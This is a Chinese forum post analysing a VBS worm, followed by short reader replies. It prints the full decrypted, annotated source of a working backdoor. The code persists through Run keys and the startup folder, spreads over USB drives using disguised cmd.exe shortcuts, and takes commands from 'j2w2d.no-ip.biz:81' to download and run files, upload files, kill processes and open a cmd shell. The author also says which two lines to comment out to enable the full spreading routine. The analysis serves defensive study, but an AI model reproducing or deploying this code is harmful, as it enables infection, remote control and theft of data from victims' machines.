一个VBS脚本病毒的简单分析

null119

原贴地址：http://www.52pojie.cn/thread-231937-1-1.html

病毒脚本行为简单描述：
运行后，复制自身到系统"%appdata%" 目录或"%temp%"目录下，设置为隐藏+系统文件属性，写注册表，添加开机自启动，然后监视可移动磁盘，有新可移动磁盘接入后，复制病毒脚本文件到可移动磁盘根目录，加隐藏+系统属性，然后遍历可移动磁盘中的所有文件及子文件夹，将除.lnk之外的所有文件及所有子文件夹全部设置为隐藏+系统属性，然后为这些文件或文件夹创建快捷方式，但快捷方式的目标参数除了打开文件本身之外，同时还会运行病毒脚本文件，以最常见的desktop.ini 文件为例，病毒脚本为其创建的快捷方式，其目标参数为：C:\Windows\system32\cmd.exe /c start 1.vbs&start desktop.ini&exit，再接着向服务器"j2w2d.no-ip.biz"的81端口，发送消息，然后根据服务器返回消息执行病毒脚本的升级，和实现下载未知文件等等功能，以上所有动作间隔5秒重复执行，而解决方法，脚本当中自带uninstall过程！

最后说明一下，此脚本目前还仅仅只是向可移动磁盘复制病毒脚本本体，因为在感染代码的'install'过程 当中有两句if not lnkfile then exit for 和 if not lnkfolder then exit for ，不过此病毒可通过网络途径自行升级，所以可能只是病毒作者还没完全做好一些准备，只要这两句代码一注释，那么，大家懂的!

以上所有仅为个人所见，如有说明不当之处，还请多多包涵！

解密脚本+简单分析标注如下，大致的东西都知道得差不多了，所以后面的一些过程也没加注释了，有功夫的慢慢看吧：

[Visual Basic] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518

'<[ recoder : houdini (c) skype : houdini-fx ]>   '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=   host = "j2w2d.no-ip.biz" port = 81 installdir = "%appdata%" lnkfile = true lnkfolder = true   '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=   dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp")     '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=   installname = wscript.scriptname  '当前脚本名称（也就是脚本的文件名） startup = shellobj.specialfolders ("startup") & "\" '上面这句是获取开始菜单-程序文件夹的路径，再拼接上startup，即为开始菜单-程序-启动文件夹，WIN7系统为C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\' installdir = shellobj.expandenvironmentstrings(installdir) & "\" ’从环境变量中返回%appdata%文件夹，WIN7系统为C:\Users\Administrator\AppData\Roaming\ if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\" ’如果不存在%appdata%文件夹，则切换为%temp% windows临时文件夹 spliter = "<" & "|" & ">" sleep = 5000 dim response dim cmd dim param info = "" usbspreading = "" startdate = "" dim oneonce   '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-= on error resume next     instance '调用instance过程，作用为读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值，如果该键不存在，则写入，根键值则根据情况写入 "true - " & date 或  "false - " & date     while true '循环体   install 'install过程就是查找连接到计算机并已经准备好的可移动磁盘，复制病毒脚本文件到该可移动磁盘中，并设置为隐藏+系统文件属性，然后将所有正常文件和子文件夹也都设置为系统+隐藏属性，并为所有正常文件和子文件夹创建快捷方式，目标参数在指向正常文件的同时指向病毒脚本   response = "" response = post ("is-ready","") '向网络服务器发送数据 cmd = split (response,spliter) select case cmd (0) '判断服务器返回参数 case "excecute" '返回的第一个参数为"excecute" 则执行服务器返回的第二个参数       param = cmd (1)       execute param case "update"       param = cmd (1)       oneonce.close       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)       '以只写方式打开病毒脚本文件       oneonce.write param       '写入服务器返回的第一个参数       oneonce.close       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)       '不显示批处理错误及提示信息运行病毒脚本文件       wscript.quit case "uninstall" '返回的第一个参数为"uninstall"时，执行install过程的逆过程       uninstall case "send" '返回的第一个参数为"send"时，下载并运行返回的第二个参数文件和第三个参数文件       download cmd (1),cmd (2) case "site-send" '返回的第一个参数为"site-send"时，下载并运行返回的第二个参数文件和第三个参数文件       sitedownloader cmd (1),cmd (2) case "recv" '返回的第一个参数为"recv"时，通过网络升级病毒脚本文件，即返回的第二个参数文件       param = cmd (1)       upload (param) case  "enum-driver"       post "is-enum-driver",enumdriver  case  "enum-faf"       param = cmd (1)       post "is-enum-faf",enumfaf (param) case  "enum-process"       post "is-enum-process",enumprocess   case  "cmd-shell"       param = cmd (1)       post "is-cmd-shell",cmdshell (param)  case  "delete" '返回的第一个参数为"delete"时，删除文件及文件夹       param = cmd (1)       deletefaf (param) case  "exit-process" '返回的第一个参数为"exit-process"时，结束pid=param的进程       param = cmd (1)       exitprocess (param) case  "sleep"       param = cmd (1)       sleep = eval (param)        end select   wscript.sleep sleep   wend     sub install on error resume next dim lnkobj dim filename dim foldername dim fileicon dim foldericon   upstart 'upstart这个过程作用就是写注册表，将脚本加入开机启动，并复制脚本文件到%appdata%或%temp%文件夹   '下面这一大段就是感染代码了   for each drive in filesystemobj.drives '遍历所有驱动器 if  drive.isready = true then '当插入移动磁盘准备接受访问时，IsReady才返回 True，可理解为当插入移动磁盘，并且系统已准备好进行读写，则执行下面代码 if  drive.freespace  > 0 then '返回驱动器可用空间值，如果大于0则 if  drive.drivetype  = 1 then '返回驱动器的类型，如果是可移动磁盘则     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true     '复制脚本文件到可移动磁盘根目录     if  filesystemobj.fileexists (drive.path & "\" & installname)  then     '如果在可移动磁盘根目录存在这个脚本文件则         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4         '设置可移动磁盘根目录的病毒脚本文件属性为隐藏+系统文件     end if     for each file in filesystemobj.getfolder( drive.path & "\" ).Files     '遍历可移动磁盘目录下的所有文件         if not lnkfile then exit for         '如果文件不是lnkfile 则退出循环         if  instr (file.name,".") then         '如果文件名中存在"."这个字符串，则             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then             '如果文件后缀后不等于"lnk"，则                 file.attributes = 2+4                 '设置文件属性为隐藏+系统文件                 if  ucase (file.name) <> ucase (installname) then                 ’如果文件名不等于病毒脚本文件名则                     filename = split(file.name,".")                     'filename(0)=文件名                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")                     '在可移动磁盘根目录下创建该文件的快捷方式                     lnkobj.windowstyle = 7                     '设置为快捷方式使用的的窗口样式类型                     lnkobj.targetpath = "cmd.exe"                     '设置快捷方式的可执行文件的路径                     lnkobj.workingdirectory = ""                     '为快捷方式指派工作目录                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"                     '设置快捷方式目标参数，该参数除了指向正常文件本身，同时还指向病毒脚本                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")                     '读取注册表中该文件的图标样式并根据情况设置该快捷方式的图标                     if  instr (fileicon,",") = 0 then                         lnkobj.iconlocation = file.path                     else                         lnkobj.iconlocation = fileicon                     end if                     lnkobj.save()                     '保存快捷方式                 end if             end if         end if     next     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders     '遍历可移动磁盘中所有子文件夹         if not lnkfolder then exit for         folder.attributes = 2+4         '设置文件夹属性为隐藏+系统文件夹         foldername = folder.name         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")         '为子文件夹创建快捷方式，下面代码跟上面都一样         lnkobj.windowstyle = 7         lnkobj.targetpath = "cmd.exe"         lnkobj.workingdirectory = ""         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")         if  instr (foldericon,",") = 0 then             lnkobj.iconlocation = folder.path         else             lnkobj.iconlocation = foldericon         end if         lnkobj.save()     next end If end If end if next err.clear end sub   sub uninstall 'install过程的逆过程 on error resume next dim filename dim foldername   shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true   for  each drive in filesystemobj.drives if  drive.isready = true then if  drive.freespace  > 0 then if  drive.drivetype  = 1 then     for  each file in filesystemobj.getfolder ( drive.path & "\").files          on error resume next          if  instr (file.name,".") then              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then                  file.attributes = 0                  if  ucase (file.name) <> ucase (installname) then                      filename = split(file.name,".")                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )                  else                      filesystemobj.deletefile (drive.path & "\" & file.name)                  end If              else                  filesystemobj.deletefile (file.path)              end if          end if      next      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders          folder.attributes = 0      next end if end if end if next wscript.quit end sub   function post (cmd ,param) '向网络服务器发送数据 post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end function   function information on error resume next if  inf = "" then     inf = hwid & spliter     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter       set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")     set os = root.execquery ("select * from win32_operatingsystem")     for each osinfo in os        inf = inf & osinfo.caption & spliter         exit for     next     inf = inf & "plus" & spliter     inf = inf & security & spliter     inf = inf & usbspreading     information = inf  else     information = inf end if end function     sub upstart () on error resume Next   shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" '上面两句是写注册表，将脚本加入开机启动 filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true '复制脚本文本到%appdata%或%temp%文件夹 filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true '复制脚本文本到开始菜单-程序-启动文件夹   end sub     function hwid on error resume next   set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disks     if  disk.volumeserialnumber <> "" then         hwid = disk.volumeserialnumber         exit for     end if next end function     function security on error resume next   security = ""   set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitems     versionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for  x = 1 to ubound (versionstr)          osversion = osversion &  versionstr (i) next osversion = eval (osversion) if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"   set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)   for each objantivirus in colantivirus     security  = security  & objantivirus.displayname & " ." next if security  = "" then security  = "nan-av" end function     function instance on error resume next usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") '读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值 if usbspreading = "" then '如果不存在这个该键，则    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then 'wscript.scriptfullname=当前脚本运行的完整路径，mid 取脚本完整路径的第二个字符到最后一个字符，如果这个前面获取的字符串等于":\"&lcase(installname)，则执行下面两行代码，否则执行Else下面两行代码       usbspreading = "true - " & date       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ" '写注册表中usbspreading的这个键值，内容为 "true - " & date   (date为系统日期）    else       usbspreading = "false - " & date       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"      end if end If       upstart set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort =  filesystemobj.getfile (installdir & installname) if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)     wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if  err.number > 0 then wscript.quit end function     sub sitedownloader (fileurl,filename) '还是下载文件，参数为（下载文件URL，下载后保存的文件名) strlink = fileurl strsaveto = installdir & filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send   set objfsodownload = createobject ("scripting.filesystemobject") if  objfsodownload.fileexists (strsaveto) then     objfsodownload.deletefile (strsaveto) end if    if objhttpdownload.status = 200 then    dim  objstreamdownload    set  objstreamdownload = createobject("adodb.stream")    with objstreamdownload                 .type = 1                 .open                 .write objhttpdownload.responsebody                 .savetofile strsaveto                 .close    end with    set objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) then    shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub   sub download (fileurl,filedir) '下载文件函数（参数为下载文件URL，下载文件保存目录) if filedir = "" then    filedir = installdir end if   strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send ""        set objfsodownload = createobject ("scripting.filesystemobject") if  objfsodownload.fileexists (strsaveto) then     objfsodownload.deletefile (strsaveto) end if if  objhttpdownload.status = 200 then     dim  objstreamdownload         set  objstreamdownload = createobject("adodb.stream")     with objstreamdownload                  .type = 1                  .open                  .write objhttpdownload.responsebody                  .savetofile strsaveto                  .close         end with     set objstreamdownload  = nothing end if if objfsodownload.fileexists(strsaveto) then    shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub     function upload (fileurl)   dim  httpobj,objstreamuploade,buffer set  objstreamuploade = createobject("adodb.stream") with objstreamuploade      .type = 1      .open          .loadfromfile fileurl          buffer = .read          .close end with set objstreamdownload = nothing set httpobj = createobject("msxml2.xmlhttp") httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false httpobj.send buffer end function     function enumdriver ()   for  each drive in filesystemobj.drives if   drive.isready = true then      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter end if next end Function   function enumfaf (enumdir)   enumfaf = enumdir & spliter for  each folder in filesystemobj.getfolder (enumdir).subfolders      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter next   for  each file in filesystemobj.getfolder (enumdir).files      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter   next end function     function enumprocess ()   on error resume next   set objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process",,48)   dim objitem for each objitem in colitems         enumprocess = enumprocess & objitem.name & "|"         enumprocess = enumprocess & objitem.processid & "|"     enumprocess = enumprocess & objitem.executablepath & spliter next end function   sub exitprocess (pid) on error resume next   shellobj.run "taskkill /F /T /PID " & pid,7,true end sub   sub deletefaf (url) on error resume next   filesystemobj.deletefile url filesystemobj.deletefolder url   end sub   function cmdshell (cmd)   dim httpobj,oexec,readallfromany   set oexec = shellobj.exec ("%comspec% /c " & cmd) if not oexec.stdout.atendofstream then    readallfromany = oexec.stdout.readall elseif not oexec.stderr.atendofstream then    readallfromany = oexec.stderr.readall else    readallfromany = "" end if   cmdshell = readallfromany end function

hsznlhd

好,学习了

Sreac.L

膜拜大神

lzxlozt

先收藏了,再慢慢学习

小宇0721

幸苦了。。

九零-鑫鑫

代码写的很清楚 不过vsb没学过 但是能看明白

null119

Sreac.L 发表于 2014-1-13 09:26
膜拜大神

小菜一个，不足挂齿

Hmily

移动下，原帖地址贴的有问题，这个是自己帖子的连接，给下具体帖子地址看看。

lovewusheng

膜拜，继续学习